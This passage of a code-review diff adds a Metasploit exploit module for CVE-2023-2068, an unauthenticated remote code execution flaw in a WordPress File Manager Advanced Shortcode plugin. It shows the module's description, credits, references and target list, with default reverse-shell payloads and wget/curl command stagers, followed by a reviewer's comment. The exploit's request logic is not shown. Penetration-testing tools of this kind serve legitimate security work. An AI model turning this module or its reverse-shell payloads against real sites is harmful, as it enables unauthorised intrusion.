modules/exploits/multi/http/wp_plugin_fma_shortcode_unauth_rce.rb

```diff
@@ -0,0 +1,319 @@
+          In the worst case, this is available to unauthenticated users, but is also works in an authenticated configuration.
+          File Manager Advanced Shortcode plugin version `2.3.2` and lower are vulnerable.
+          To install the Shortcode plugin File Manager Advanced version `5.0.5` or lower is required to keep the configuration
+          vulnerable. Any user privileges can exploit this vulnerability which results in access to the underlying operating system
+          with the same privileges under which the Wordpress web services run. 
+        },
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module
+          'Mateus Machado Tesser' # discovery
+        ],
+        'References' => [
+          ['CVE', '2023-2068'],
+          ['URL', 'https://attackerkb.com/topics/JncRCWZ5xm/cve-2023-2068'],
+          ['PACKETSTORM', '172707'],
+          ['WPVDB', '58f72953-56d2-4d86-a49b-311b5fc58056']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => ['windows', 'unix', 'linux', 'php'],
+        'Privileged' => false,
+        'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86, ARCH_AARCH64],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'Space' => 65535,
+              'CmdStagerFlavor' => ['wget', 'curl', 'printf', 'bourne'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Powershell',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :windows_powershell,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
```

Comment:
You can remove this target, as you've already specified you can execute the powershell payloads like you do in the target above.